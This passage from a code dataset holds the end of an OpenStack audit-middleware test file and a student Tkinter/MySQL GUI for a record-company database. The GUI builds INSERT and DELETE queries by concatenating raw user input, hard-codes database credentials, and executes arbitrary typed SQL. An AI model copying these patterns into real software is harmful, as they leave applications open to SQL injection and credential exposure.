'user_name',\n 'HTTP_X_AUTH_TOKEN': 'token',\n 'HTTP_X_PROJECT_ID': 'tenant_id',\n 'HTTP_X_IDENTITY_STATUS': 'Confirmed'}\n env_headers['REQUEST_METHOD'] = req_type\n return env_headers\n\n def test_api_request(self):\n middleware = audit.AuditMiddleware(\n FakeApp(),\n audit_map_file=self.audit_map,\n service_name='pycadf')\n req = webob.Request.blank('/foo/bar',\n environ=self._get_environ_header('GET'))\n with mock.patch('oslo.messaging.Notifier.info') as notify:\n middleware(req)\n # Check first notification with only 'request'\n call_args = notify.call_args_list[0][0]\n self.assertEqual('audit.http.request', call_args[1])\n self.assertEqual('/foo/bar', call_args[2]['requestPath'])\n self.assertEqual('pending', call_args[2]['outcome'])\n self.assertNotIn('reason', call_args[2])\n self.assertNotIn('reporterchain', call_args[2])\n\n # Check second notification with request + response\n call_args = notify.call_args_list[1][0]\n self.assertEqual('audit.http.response', call_args[1])\n self.assertEqual('/foo/bar', call_args[2]['requestPath'])\n self.assertEqual('success', call_args[2]['outcome'])\n self.assertIn('reason', call_args[2])\n self.assertIn('reporterchain', call_args[2])\n\n def test_api_request_failure(self):\n middleware = audit.AuditMiddleware(\n FakeFailingApp(),\n audit_map_file=self.audit_map,\n service_name='pycadf')\n req = webob.Request.blank('/foo/bar',\n environ=self._get_environ_header('GET'))\n with mock.patch('oslo.messaging.Notifier.info') as notify:\n try:\n middleware(req)\n self.fail('Application exception has not been re-raised')\n except Exception:\n pass\n # Check first notification with only 'request'\n call_args = notify.call_args_list[0][0]\n self.assertEqual('audit.http.request', call_args[1])\n self.assertEqual('/foo/bar', call_args[2]['requestPath'])\n self.assertEqual('pending', call_args[2]['outcome'])\n self.assertNotIn('reporterchain', call_args[2])\n\n # Check second notification with request + response\n call_args = notify.call_args_list[1][0]\n self.assertEqual('audit.http.response', call_args[1])\n self.assertEqual('/foo/bar', 
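# after the wrapped app raises, the response event is still emitted but its
# outcome is reported as 'unknown' (checked on the next assertion)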
call_args[2]['requestPath'])\n self.assertEqual('unknown', call_args[2]['outcome'])\n self.assertIn('reporterchain', call_args[2])\n\n def test_process_request_fail(self):\n middleware = audit.AuditMiddleware(\n FakeApp(),\n audit_map_file=self.audit_map,\n service_name='pycadf')\n req = webob.Request.blank('/foo/bar',\n environ=self._get_environ_header('GET'))\n with mock.patch('oslo.messaging.Notifier.info',\n side_effect=Exception('error')) as notify:\n middleware._process_request(req)\n self.assertTrue(notify.called)\n\n def test_process_response_fail(self):\n middleware = audit.AuditMiddleware(\n FakeApp(),\n audit_map_file=self.audit_map,\n service_name='pycadf')\n req = webob.Request.blank('/foo/bar',\n environ=self._get_environ_header('GET'))\n with mock.patch('oslo.messaging.Notifier.info',\n side_effect=Exception('error')) as notify:\n middleware._process_response(req, webob.response.Response())\n self.assertTrue(notify.called)\n\n def test_ignore_req_opt(self):\n middleware = audit.AuditMiddleware(FakeApp(),\n audit_map_file=self.audit_map,\n ignore_req_list='get, PUT')\n req = webob.Request.blank('/skip/foo',\n environ=self._get_environ_header('GET'))\n req1 = webob.Request.blank('/skip/foo',\n environ=self._get_environ_header('PUT'))\n req2 = webob.Request.blank('/accept/foo',\n environ=self._get_environ_header('POST'))\n with mock.patch('oslo.messaging.Notifier.info') as notify:\n # Check GET/PUT request does not send notification\n middleware(req)\n middleware(req1)\n self.assertEqual([], notify.call_args_list)\n\n # Check non-GET/PUT request does send notification\n middleware(req2)\n self.assertThat(notify.call_args_list, matchers.HasLength(2))\n call_args = notify.call_args_list[0][0]\n self.assertEqual('audit.http.request', call_args[1])\n self.assertEqual('/accept/foo', call_args[2]['requestPath'])\n\n call_args = notify.call_args_list[1][0]\n self.assertEqual('audit.http.response', call_args[1])\n self.assertEqual('/accept/foo', call_args[2]['requestPath'])\n\n def test_api_request_no_messaging(self):\n middleware = audit.AuditMiddleware(\n FakeApp(),\n audit_map_file=self.audit_map,\n service_name='pycadf')\n req = webob.Request.blank('/foo/bar',\n environ=self._get_environ_header('GET'))\n with mock.patch('keystonemiddleware.audit.messaging', None):\n with mock.patch('keystonemiddleware.audit._LOG.info') as log:\n middleware(req)\n # Check first notification with only 'request'\n call_args = log.call_args_list[0][0]\n self.assertEqual('audit.http.request',\n call_args[1]['event_type'])\n\n # Check second notification with request + response\n call_args = log.call_args_list[1][0]\n self.assertEqual('audit.http.response',\n call_args[1]['event_type'])\n","repo_name":"opensds/proposals","sub_path":"intel-sds-proto/vsm_configure_guide/packages/vsm_keystone_update/keystonemiddleware/keystonemiddleware/tests/test_audit_middleware.py","file_name":"test_audit_middleware.py","file_ext":"py","file_size_in_byte":8574,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"12818642855","text":"# DataBases Project\n# Team 8 - Evangelia Gkagka & Dimitrios Makris\n\nimport mysql.connector as mysql\nfrom mysql.connector import errorcode\nfrom PIL import Image, ImageTk\nimport tkinter as tk\nfrom tkinter import ttk\n\nclass DbConnection():\n def __init__(self, dbname):\n self.dbname = dbname\n self.status = ''''''\n try:\n self.db = mysql.connect(host = 'localhost',\n user = 'db_project',\n password = 'password',\n database = 
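# host/user/password above are hard-coded credentials for a local development server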
dbname)\n self.cursor = self.db.cursor()\n\n self.cursor.execute(\"use discography_company;\")\n \n except mysql.Error as err:\n if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:\n self.status = '''Connection Refused\\nSomething is wrong with\\nyour user name or password'''\n elif err.errno == errorcode.ER_BAD_DB_ERROR:\n self.status = '''Connection Refused\\nDatabase does not exist'''\n else:\n self.status = \"Connection Refused\\nA connection error has occurred\"\n else:\n self.status = '''Connection Established'''\n \n def close(self):\n self.db.commit()\n self.db.close()\n \n\n def executeQuery(self, query): \n result = ''''''\n self.error = \"notError\"\n \n try :\n self.cursor.execute(query)\n rowsAffected = self.cursor.rowcount\n for row in self.cursor.fetchall():\n result += (\" | \".join([str(item)for item in row]))\n result += '\\n\\n'\n self.db.commit()\n except mysql.Error as err:\n self.error = err\n result = ''' An error has occurred, please check your query '''\n rowsAffected = 0\n \n return result, rowsAffected\n \n def executeQuery2(self, query): \n self.error = \"notError\"\n \n try :\n self.cursor.execute(query)\n result = self.cursor.fetchall()\n desc = self.cursor.description\n self.db.commit()\n except mysql.Error as err:\n self.error = err\n \n return result, desc\n \n \nclass ScrollableImage(tk.Frame):\n def __init__(self, master=None, **kw):\n self.image = kw.pop('image', None)\n sw = kw.pop('scrollbarwidth', 10)\n super(ScrollableImage, self).__init__(master=master, **kw)\n self.cnvs = tk.Canvas(self, highlightthickness=0, **kw)\n self.cnvs.create_image(0, 0, anchor='nw', image=self.image)\n self.v_scroll = tk.Scrollbar(self, orient='vertical', width=sw)\n self.h_scroll = tk.Scrollbar(self, orient='horizontal', width=sw)\n self.cnvs.grid(row=0, column=0, sticky='nsew')\n self.h_scroll.grid(row=1, column=0, sticky='ew')\n self.v_scroll.grid(row=0, column=1, sticky='ns')\n self.rowconfigure(0, weight=1)\n self.columnconfigure(0, weight=1)\n self.cnvs.config(xscrollcommand=self.h_scroll.set, yscrollcommand=self.v_scroll.set)\n self.v_scroll.config(command=self.cnvs.yview)\n self.h_scroll.config(command=self.cnvs.xview)\n self.cnvs.config(scrollregion=self.cnvs.bbox('all'))\n \n\nclass QueryDesc():\n def __init__(self, txt, query, ypos):\n '''\n input: string = text, string = query, rely = ypos\n '''\n \n #Label\n label = tk.Label(prepFrame, text = txt, font = largeFont, bg = 'black', fg = 'white').place(relx = 0.45, rely = ypos, anchor = 'center')\n\n #Button\n button = tk.Button(prepFrame, height = 2, width = 6, text = \"View\", bg = 'black', fg = 'white', font = smallFont, command = lambda: showResult(query))\n button.place(relx = 0.85, rely = ypos, anchor = 'center')\n \n \n\nclass LabelEntry():\n def __init__(self, text, pos, frame):\n '''\n input: string = text, list = pos = [relx, rely] (of the label), frame = frame\n '''\n\n self.userInput = tk.StringVar()\n\n label = tk.Label(frame, text = text + \":\", font = middleFont, bg = 'black', fg = 'white').place(relx = pos[0], rely = pos[1], anchor = 'center')\n \n entry = tk.Entry(frame, textvariable = self.userInput, font = smallFont).place(relx = pos[0] + 0.15, rely = pos[1], anchor = 'center')\n \n\ndef deleteData():\n flag = 0\n delMemberQuery = '''DELETE FROM member WHERE person_AFM = '''\n \n delAfm = afmInput.get()\n \n delMemberQuery += \"'\" + delAfm + \"'\" + ';'\n \n result, rowsAffected = db.executeQuery(delMemberQuery)\n if(db.error != \"notError\"): flag = 1\n \n if(flag == 0 and rowsAffected != 0):\n 
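# rowsAffected == 0 means no member row matched that AFM, so only a non-zero
# row count (and no SQL error) is reported as a successful delete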
deleteSuccess.place(relx = 0.5, rely = 0.8, anchor = 'center')\n deleteSuccessStrV.set(\"Member deleted successfully\")\n \n if(flag == 1 or rowsAffected == 0):\n deleteFailure.place(relx = 0.5, rely = 0.8, anchor = 'center')\n deleteFailureStrV.set(\"An error has occurred, please check your input\")\n \n \n \n afmInput.set('') \n \n\ndef viewMembers():\n raiseFrame(membersFrame)\n \n title = tk.Label(membersFrame, text = \"Details of Members\", font = titleFont, bg = 'black', fg = 'white').place(relx = 0.5, rely = 0.1, anchor = 'center')\n menuBtn = tk.Button(membersFrame, text = \"Menu\", font = middleFont, command = back2MenuDelete, bg = 'black', fg = 'white').place(relx = 0.05, rely = 0.05)\n \n backBtn = tk.Button(membersFrame, text = \"Back\", font = middleFont, command = back2DeleteMember, bg = 'black', fg = 'white').place(relx = 0.12, rely = 0.05)\n \n membersQuery = '''SELECT person_AFM, fname, lname FROM member; '''\n \n membersBox = tk.Text(membersFrame, height = 30, width = 70, font = middleFont, bg = slate, fg = 'white')\n membersBox.place(relx = 0.5, rely = 0.5, anchor = 'center')\n \n result, rowsAffected = db.executeQuery(membersQuery)\n membersBox.insert('end', result)\n membersBox.config(state = 'disable')\n \n \n \n\ndef deleteMember():\n raiseFrame(delMemberFrame)\n \n global afmInput\n \n afmInput = tk.StringVar()\n \n title = tk.Label(delMemberFrame, text = \"Delete member from database\", font = titleFont, bg = 'black', fg = 'white').place(relx = 0.5, rely = 0.1, anchor = 'center')\n menuBtn = tk.Button(delMemberFrame, text = \"Menu\", font = middleFont, command = back2MenuDelete, bg = 'black', fg = 'white').place(relx = 0.05, rely = 0.05)\n \n delLabel = tk.Label(delMemberFrame, text = \"Enter the member's AFM: \", font = largeFont, bg = 'black', fg = 'white').place(relx = 0.5, rely = 0.3, anchor = 'center')\n \n delAfmEntry = tk.Entry(delMemberFrame, textvariable = afmInput, font = smallFont).place(relx = 0.5, rely = 0.4, anchor = 'center')\n delAfmComment = tk.Label(delMemberFrame, text = '6-digit integer', font = commentFont, bg='black', fg='white').place(relx=0.5, rely=0.43, anchor = 'center')\n \n global deleteSuccessStrV, deleteSuccess\n deleteSuccessStrV = tk.StringVar()\n deleteSuccess = tk.Label(delMemberFrame, textvariable = deleteSuccessStrV, font = largeFont, bg = 'black', fg = 'white')\n\n global deleteFailureStrV, deleteFailure\n deleteFailureStrV = tk.StringVar()\n deleteFailure = tk.Label(delMemberFrame, textvariable = deleteFailureStrV, font = largeFont, bg = 'black', fg = 'white')\n \n delBtn = tk.Button(delMemberFrame, text = \"DELETE\", font = middleFont, command = deleteData, bg = 'black', fg = 'white').place(relx = 0.5, rely = 0.65, anchor = 'center')\n \n membersBtn = tk.Button(delMemberFrame, text = \"See all members and their AFM\", font = middleFont, command = viewMembers, bg = 'black', fg = 'white').place(relx = 0.5, rely = 0.5, anchor = 'center')\n \n \ndef insertData():\n \n flag = 0\n \n memberQuery = '''INSERT INTO member(person_AFM, fname, lname, email, telephone, birth_date, sex, street_number, street, city, zip_code, country, expertise) VALUES ('''\n contractQuery = '''INSERT INTO contract(start_date, end_date, songs_num, albums_num) VALUES ('''\n artistQuery = '''INSERT INTO artist(name, genre) VALUES ('''\n contractIDQuery = '''SELECT MAX(contract_ID) FROM contract;'''\n artistIDQuery = '''SELECT MAX(artist_ID) FROM artist;'''\n\n afm = afmEntry.userInput.get()\n fname = fnameEntry.userInput.get()\n lname = 
lnameEntry.userInput.get()\n email = emailEntry.userInput.get()\n tel = telEntry.userInput.get()\n birthdate = birthEntry.userInput.get()\n sex = sexStrV.get()\n address = addressEntry.userInput.get()\n addressNo = addressNoEntry.userInput.get()\n city = cityEntry.userInput.get()\n zipCode = zipCodeEntry.userInput.get()\n country = countryEntry.userInput.get()\n expertise = expertiseEntry.userInput.get()\n\n for el in (afm, fname, lname, email, tel, birthdate, sex, addressNo, address, city, zipCode, country):\n memberQuery += \"'\"\n memberQuery += el\n memberQuery += \"'\"\n memberQuery += ', '\n \n memberQuery += \"'\"\n memberQuery += expertise\n memberQuery += \"'\"\n memberQuery += ');'\n\n startDate = startDateEntry.userInput.get()\n endDate = endDateEntry.userInput.get()\n songsNo = songsNoEntry.userInput.get()\n albumsNo = albumsNoEntry.userInput.get()\n\n for el in (startDate, endDate, songsNo):\n contractQuery += \"'\"\n contractQuery += el\n contractQuery += \"'\"\n contractQuery += ', '\n\n contractQuery += \"'\"\n contractQuery += albumsNo\n contractQuery += \"'\"\n contractQuery += ');'\n\n artist = artistEntry.userInput.get()\n genre = genreEntry.userInput.get()\n\n artistQuery += \"'\" + artist + \"'\" + ', ' + \"'\" + genre + \"'\" + ');'\n \n db.executeQuery(memberQuery)\n if(db.error != \"notError\"): flag = 1\n \n db.executeQuery(contractQuery)\n if(db.error != \"notError\"): flag = 1\n \n db.executeQuery(artistQuery)\n if(db.error != \"notError\"): flag = 1\n \n contract_ID, rowsAffected = db.executeQuery(contractIDQuery)\n if(db.error != \"notError\"): flag = 1\n \n artist_ID, rowsAffected = db.executeQuery(artistIDQuery)\n if(db.error != \"notError\"): flag = 1\n \n mscQuery = \"INSERT INTO Member_Signs_Contract(person_AFM, contract_ID) VALUES ({}, {});\".format(afm, contract_ID)\n mhaQuery = \"INSERT INTO Member_Has_Artist(person_AFM, artist_ID) VALUES ({}, {});\".format(afm, artist_ID)\n \n db.executeQuery(mscQuery)\n if(db.error != \"notError\"): flag = 1\n \n db.executeQuery(mhaQuery)\n if(db.error != \"notError\"): flag = 1\n \n if(flag == 0):\n insertSuccess.place(relx = 0.5, rely = 0.8, anchor = 'center')\n insertSuccessStrV.set(\"Member, contract and artist were entered successfully\")\n \n if(flag == 1):\n insertFailure.place(relx = 0.5, rely = 0.8, anchor = 'center')\n insertFailureStrV.set(\"An error has occurred, please check your inputs\")\n \n for ent in (afmEntry, fnameEntry, lnameEntry, emailEntry, telEntry, birthEntry, addressEntry, addressNoEntry, cityEntry, zipCodeEntry, countryEntry, expertiseEntry, startDateEntry, endDateEntry, songsNoEntry, albumsNoEntry, artistEntry, genreEntry):\n ent.userInput.set('') \n \n sexStrV.set('') \n \n\ndef addMember():\n\n raiseFrame(memberFrame)\n \n\n title1 = tk.Label(memberFrame, text = \"Insert new member to database\", font = titleFont, bg = 'black', fg = 'white').place(relx = 0.5, rely = 0.1, anchor = 'center')\n menuBtn1 = tk.Button(memberFrame, text = \"Menu\", font = middleFont, command = back2MenuInsert, bg = 'black', fg = 'white').place(relx = 0.05, rely = 0.05)\n\n title2 = tk.Label(contArtFrame, text = \"Insert member's contract details\", font = titleFont, bg = 'black', fg = 'white').place(relx = 0.5, rely = 0.1, anchor = 'center')\n menuBtn2 = tk.Button(contArtFrame, text = \"Menu\", font = middleFont, command = back2MenuInsert, bg = 'black', fg = 'white').place(relx = 0.05, rely = 0.05)\n backBtn = tk.Button(contArtFrame, text = \"Back\", font = middleFont, command = back2NewMember, bg = 'black', 
fg = 'white').place(relx = 0.12, rely = 0.05)\n\n\n global afmEntry, fnameEntry, lnameEntry, emailEntry, telEntry, birthEntry, addressEntry, addressNoEntry, cityEntry, zipCodeEntry, countryEntry, expertiseEntry, sexStrV, startDateEntry, endDateEntry, songsNoEntry, albumsNoEntry, artistEntry, genreEntry \n\n afmEntry = LabelEntry(\"AFM\", [0.2, 0.2], memberFrame)\n afmComment = tk.Label(memberFrame, text = '6-digit integer', font = commentFont, bg='black', fg='white').place(relx=0.35, rely=0.23, anchor = 'center')\n fnameEntry = LabelEntry(\"First Name\", [0.2, 0.3], memberFrame)\n lnameEntry = LabelEntry(\"Last Name\", [0.2, 0.4], memberFrame)\n emailEntry = LabelEntry(\"Email\", [0.2, 0.5], memberFrame)\n telEntry = LabelEntry(\"Telephone\", [0.2, 0.6], memberFrame)\n birthEntry = LabelEntry(\"Date of Birth\", [0.2, 0.7], memberFrame)\n dateComment = tk.Label(memberFrame, text = 'date format: YYYY-MM-DD', font = commentFont, bg='black', fg='white').place(relx=0.35, rely=0.73, anchor = 'center')\n\n sexLabel = tk.Label(memberFrame, text = \"Sex:\", font = middleFont, bg = 'black', fg = 'white').place(relx = 0.2, rely = 0.8, anchor='center')\n sexStrV = tk.StringVar()\n sexCombo = ttk.Combobox(memberFrame, width = 18, textvariable = sexStrV, state = \"readonly\", values = (\"Male\", \"Female\") ,font = smallFont)\n sexCombo.place(relx = 0.35, rely = 0.8, anchor = 'center')\n\n addressEntry = LabelEntry(\"Address\", [0.6, 0.2], memberFrame)\n addressNoEntry = LabelEntry(\"Address no\", [0.6, 0.3], memberFrame)\n cityEntry = LabelEntry(\"City\", [0.6, 0.4], memberFrame)\n zipCodeEntry = LabelEntry(\"Zip Code\", [0.6, 0.5], memberFrame)\n countryEntry = LabelEntry(\"Country\", [0.6, 0.6], memberFrame)\n expertiseEntry = LabelEntry(\"Expertise\", [0.6, 0.7], memberFrame)\n\n nextBtn = tk.Button(memberFrame, text = \"NEXT\", width = 10, font = middleFont, command = go2ContArt, bg = 'black', fg = 'white').place(relx = 0.75, rely = 0.8, anchor = 'center')\n\n startDateEntry = LabelEntry(\"Start date\", [0.2, 0.2], contArtFrame)\n dateComment1 = tk.Label(contArtFrame, text = 'date format: YYYY-MM-DD', font = commentFont, bg='black', fg='white').place(relx=0.35, rely=0.23, anchor = 'center')\n songsNoEntry = LabelEntry(\"Songs no\", [0.2, 0.3], contArtFrame)\n\n endDateEntry = LabelEntry(\"End date\", [0.6, 0.2], contArtFrame)\n dateComment2 = tk.Label(contArtFrame, text = 'date format: YYYY-MM-DD', font = commentFont, bg='black', fg='white').place(relx=0.75, rely=0.23, anchor = 'center')\n albumsNoEntry = LabelEntry(\"Albums no\", [0.6, 0.3], contArtFrame)\n\n title3 = tk.Label(contArtFrame, text = \"Insert artist's details\", font = titleFont, bg = 'black', fg = 'white').place(relx = 0.5, rely = 0.4, anchor = 'center')\n\n artistEntry = LabelEntry(\"Artist name\", [0.2, 0.5], contArtFrame)\n genreEntry = LabelEntry(\"Genre\", [0.6, 0.5], contArtFrame)\n \n global insertSuccessStrV, insertSuccess\n insertSuccessStrV = tk.StringVar()\n insertSuccess = tk.Label(contArtFrame, textvariable = insertSuccessStrV, font = largeFont, bg = 'black', fg = 'white')\n\n global insertFailureStrV, insertFailure\n insertFailureStrV = tk.StringVar()\n insertFailure = tk.Label(contArtFrame, textvariable = insertFailureStrV, font = largeFont, bg = 'black', fg = 'white')\n\n submitBtn = tk.Button(contArtFrame, text = \"SUBMIT\", width = 10, font = middleFont, bg = 'black', fg = 'white', command = insertData).place(relx = 0.5, rely = 0.65, anchor = 'center')\n \n \ndef raiseFrame(frame):\n frame.tkraise()\n \n\ndef 
showResultTable(query):\n \n raiseFrame(tableFrame)\n title = tk.Label(tableFrame, text = \"Result Table:\", font = titleFont, bg = 'black', fg = 'white').place(relx = 0.5, rely = 0.1, anchor='center')\n menuBtn = tk.Button(tableFrame, text = \"Menu\", font=middleFont, command = back2MenuTable, bg = 'black', fg = 'white').place(relx = 0.05, rely = 0.05)\n \n global trv\n trv = ttk.Treeview(tableFrame, selectmode = 'browse', height = 25)\n trv.place(relx = 0.5, rely = 0.55, anchor='center')\n \n res, desc = db.executeQuery2(query)\n \n columnsNum = len(desc)\n columnsNames = [i[0] for i in desc]\n \n collst = []\n \n for i in range(columnsNum):\n collst.append(\"{}\".format(i))\n \n trv[\"columns\"] = collst\n \n trv['show'] = 'headings'\n \n for i in range(columnsNum):\n trv.column(\"{}\".format(i), width = 70, anchor ='c')\n \n j = 0\n for col in columnsNames:\n trv.heading(\"{}\".format(j), text = \"{}\".format(col), anchor ='c')\n j += 1\n\n x = 0\n for i in res:\n trv.insert(\"\", 'end', iid = x, values = i)\n x += 1\n \n \ndef showResult(query):\n '''\n input: string\n '''\n \n raiseFrame(resultFrame)\n title = tk.Label(resultFrame, text = \"Result:\", font = titleFont, bg = 'black', fg = 'white').place(relx = 0.5, rely = 0.1, anchor='center')\n menuBtn = tk.Button(resultFrame, text = \"Menu\", font=middleFont, command = back2Menu, bg = 'black', fg = 'white').place(relx = 0.05, rely = 0.05)\n \n questionBox = tk.Text(resultFrame, height = 6, width = 70, font = middleFont, bg = slate, fg = 'white')\n questionBox.place(relx = 0.5, rely = 0.25, anchor = 'center')\n \n questionBox.insert('end', query)\n questionBox.config(state = 'disable')\n \n resultBox = tk.Text(resultFrame, height = 15, width = 70, font = middleFont, bg = slate, fg = 'white')\n resultBox.place(relx = 0.5, rely = 0.6, anchor = 'center')\n \n result, rowsAffected = db.executeQuery(query)\n resultBox.insert('end', result)\n resultBox.config(state = 'disable') \n \n global tableBtn\n if (db.error == 'notError'): \n tableBtn = tk.Button(resultFrame, text = \"View in table\", font = largeFont, command = lambda: showResultTable(query), bg = 'black', fg = 'white')\n tableBtn.place(relx = 0.5, rely = 0.85, anchor = 'center')\n \n\ndef viewErd():\n raiseFrame(erdFrame)\n\n title = tk.Label(erdFrame, text = \"Entity Relationship Diagram\", font = titleFont, bg='black', fg='white').place(relx=0.5, rely=0.1, anchor='center')\n menuBtn = tk.Button(erdFrame, text = \"Menu\", font = middleFont,\n command = back2Menu, bg = 'black', fg = 'white').place(relx = 0.05, rely = 0.05)\n\n erd_img = ImageTk.PhotoImage(Image.open(\"assets/erd.png\"))\n\n erd = ScrollableImage(erdFrame, image = erd_img, scrollbarwidth = 15, width = 800, height = 600)\n erd.pack()\n\n erd.place(relx = 0.5, rely = 0.55, anchor='center')\n\n\ndef viewRelSchema():\n raiseFrame(schemaFrame)\n\n title = tk.Label(schemaFrame, text = \"Relational Schema\", font = titleFont, bg = 'black', fg = 'white').place(relx = 0.5, rely = 0.1, anchor = 'center')\n menuBtn = tk.Button(schemaFrame, text = \"Menu\", font = middleFont, command = back2Menu, bg = 'black', fg = 'white').place(relx = 0.05, rely = 0.05)\n\n schema_img = ImageTk.PhotoImage(Image.open(\"assets/schema.png\"))\n\n schema = ScrollableImage(schemaFrame, image = schema_img, scrollbarwidth = 15, width = 800, height = 600)\n schema.pack()\n\n schema.place(relx = 0.5, rely = 0.55, anchor = 'center')\n\n\ndef commandLine():\n raiseFrame(cmdFrame)\n\n title = tk.Label(cmdFrame, text = \"Write your query below\", font = 
titleFont, bg = 'black', fg = 'white').place(relx = 0.5, rely = 0.1, anchor='center')\n menuBtn = tk.Button(cmdFrame, text = \"Menu\", font=middleFont, command = back2Menu, bg = 'black', fg = 'white').place(relx = 0.05, rely = 0.05)\n \n queryBox = tk.Text(cmdFrame, height = 15, width = 70, font = middleFont, bg = slate, fg = 'white')\n queryBox.place(relx = 0.5, rely = 0.45, anchor = 'center')\n\n submitBtn = tk.Button(cmdFrame, text = \"Execute\", font = largeFont, bg = 'black', fg = 'white', command = lambda: showResult(queryBox.get(1.0, 'end'))).place(relx = 0.5, rely = 0.8, anchor = 'center')\n\n\ndef preparedQueries():\n raiseFrame(prepFrame)\n \n title = tk.Label(prepFrame, text = \"Select a query\", font = titleFont, bg = 'black', fg='white').place(relx = 0.5, rely = 0.1, anchor = 'center')\n menuBtn = tk.Button(prepFrame, text = \"Menu\", font = middleFont, command = back2Menu, bg = 'black', fg='white').place(relx = 0.05, rely = 0.05)\n \n #Queries\n text1 = ''' Update every contract for one month '''\n query1 = ''' UPDATE contract SET end_date = DATE_ADD(end_date, INTERVAL 1 MONTH); '''\n QueryDesc(text1, query1, 0.2)\n \n text2 = ''' Number of members in each band (more than 1 member) '''\n query2 = ''' SELECT A.name, COUNT(M.fname) FROM artist AS A, Member_Has_Artist as MA, member as M WHERE A.artist_ID = MA.artist_ID AND MA.person_AFM = M.person_AFM GROUP BY A.artist_ID HAVING COUNT(M.fname) > 1 ORDER BY COUNT(fname) DESC; '''\n QueryDesc(text2, query2, 0.3)\n \n text3 = ''' Songs of each album '''\n query3 = ''' SELECT A.name, S.title FROM album AS A JOIN song AS S ON A.album_ID = S.album_ID ORDER BY A.name; '''\n QueryDesc(text3, query3, 0.4)\n\n text4 = ''' Albums that will be released in this year '''\n dropIndex = ''' ALTER TABLE album DROP INDEX relDateIndex; '''\n index = ''' CREATE INDEX relDateIndex ON album (released_date); '''\n query4 = ''' SELECT name, released_date FROM album WHERE YEAR(released_date) = YEAR(CURDATE()) ORDER BY released_date; '''\n QueryDesc(text4, query4, 0.5)\n\n text5 = ''' Collaborators whose contract ends in less than two years from now '''\n query5 = ''' SELECT Col.person_AFM, Col.fname, Col.lname, Con.end_date FROM collaborator AS Col, contract AS Con, Col_Signs_Contract AS ColCon WHERE Col.person_AFM = ColCon.person_AFM AND Con.contract_ID = ColCon.contract_ID AND DATEDIFF(end_date, CURDATE()) <= 730 ORDER BY DATEDIFF(end_date, CURDATE()); '''\n QueryDesc(text5, query5, 0.6)\n\n text6 = ''' Studio engineers that worked for each album '''\n query6 = ''' SELECT E.fname, E.lname, T.type, S.name FROM studio_engineer AS E, se_type AS T, SE_Has_SEType AS ET, studio AS S, SE_WorksAt_Studio AS ES WHERE E.se_AFM = ET.se_AFM AND T.se_type_ID = ET.se_type_ID AND S.studio_ID = ES.studio_ID AND E.se_AFM = ES.se_AFM; '''\n QueryDesc(text6, query6, 0.7)\n \n text7 = ''' 10 most expensive studios and the studio engineers who work there '''\n query7 = ''' SELECT S.name, S.price_per_hour, SE.fname, SE.lname FROM studio AS S, studio_engineer AS SE, SE_WorksAt_Studio AS SES WHERE SE.se_AFM = SES.se_AFM AND S.studio_ID = SES.studio_ID ORDER BY price_per_hour DESC LIMIT 10; '''\n QueryDesc(text7, query7, 0.8)\n\n text8 = ''' All studios with price per hour less than 800$\\nthat are not available after October 2023 '''\n query8 = ''' SELECT name, price_per_hour, available_start, available_end FROM studio WHERE price_per_hour < 800 AND MONTH(available_start) = 10 AND YEAR(available_end) <= 2023; '''\n QueryDesc(text8, query8, 0.9)\n\n\ndef back2MenuInsert():\n 
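# each back2Menu* variant resets its own screen's status widgets before
# raising the menu frame again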
raiseFrame(menuFrame)\n insertSuccessStrV.set('')\n insertFailureStrV.set('')\n \n\ndef back2MenuDelete():\n raiseFrame(menuFrame)\n deleteSuccessStrV.set('')\n deleteFailureStrV.set('')\n\n \ndef back2MenuTable():\n raiseFrame(menuFrame)\n trv.destroy()\n tableBtn.destroy()\n \n \ndef back2Menu():\n raiseFrame(menuFrame) \n\n \ndef back2NewMember():\n raiseFrame(memberFrame)\n\ndef go2ContArt():\n raiseFrame(contArtFrame)\n \ndef back2DeleteMember():\n raiseFrame(delMemberFrame)\n \n \ndef createGUI():\n \n title0 = tk.Label(menuFrame, text = \"RECORD COMPANY\", font = titleFont, bg = 'black', fg='white').place(relx = 0.5, rely = 0.1, anchor = 'center')\n \n choice1 = tk.Button(menuFrame, text = \"View ER Diagram\", font = middleFont, command = viewErd, bg = 'black', fg='white').place(relx = 0.5, rely = 0.2, anchor = 'center')\n \n choice2 = tk.Button(menuFrame, text = \"View Relational Schema\", font = middleFont, command = viewRelSchema, bg = 'black', fg='white').place(relx = 0.5, rely = 0.3, anchor = 'center') \n \n choice3 = tk.Button(menuFrame, text = \"Write Query\", font = middleFont, command = commandLine, bg = 'black', fg='white').place(relx = 0.5, rely = 0.4, anchor = 'center')\n \n choice4 = tk.Button(menuFrame, text = \"Select Function\", font = middleFont, command = preparedQueries, bg = 'black', fg='white').place(relx = 0.5, rely = 0.5, anchor = 'center') \n \n choice5 = tk.Button(menuFrame, text = \"Add New Member\", font = middleFont, command = addMember, bg = 'black', fg='white').place(relx = 0.5, rely = 0.6, anchor = 'center')\n \n choice6 = tk.Button(menuFrame, text = \"Delete Member\", font = middleFont, command = deleteMember, bg = 'black', fg='white').place(relx = 0.5, rely = 0.7, anchor = 'center')\n \n statusTitle = tk.Label(menuFrame, text = \"Status: \", font = middleFont, bg = 'black', fg = 'white').place(relx = 0.75, rely = 0.8)\n \n team = tk.Label(menuFrame, text = \"Team #08\\nEvangelia Gkagka\\nDimitrios Makris\", font = middleFont, bg = 'black', fg = 'white').place(relx = 0.18, rely = 0.84, anchor = 'center')\n \n statusBox = tk.Text(menuFrame, height = 3, width = 25, bg = 'black', fg = 'white', font = smallFont)\n statusBox.place(relx = 0.75, rely = 0.83)\n status = db.status\n statusBox.insert('end', status)\n statusBox.config(highlightthickness = 0, borderwidth=0)\n statusBox.config(state = 'disable') #read_only\n \n raiseFrame(menuFrame)\n root.mainloop()\n \n\n \n \nif __name__ == \"__main__\":\n \n #Connection with DB\n curDb = 'discography_company'\n db = DbConnection(curDb)\n\n #Root Window\n root = tk.Tk()\n root.geometry(\"1024x768\")\n root.resizable(0, 0)\n root.title(\"Discography Company Database\")\n\n #Frames\n menuFrame = tk.Frame(root, width = 1024, height = 768, bg = 'black')\n prepFrame = tk.Frame(root, width = 1024, height = 768, bg = 'black')\n cmdFrame = tk.Frame(root, width = 1024, height = 768, bg = 'black')\n resultFrame = tk.Frame(root, width = 1024, height = 768, bg = 'black')\n erdFrame = tk.Frame(root, width = 1024, height = 768, bg = 'black')\n schemaFrame = tk.Frame(root, width = 1024, height = 768, bg = 'black')\n memberFrame = tk.Frame(root, width = 1024, height = 768, bg = 'black')\n contArtFrame = tk.Frame(root, width = 1024, height = 768, 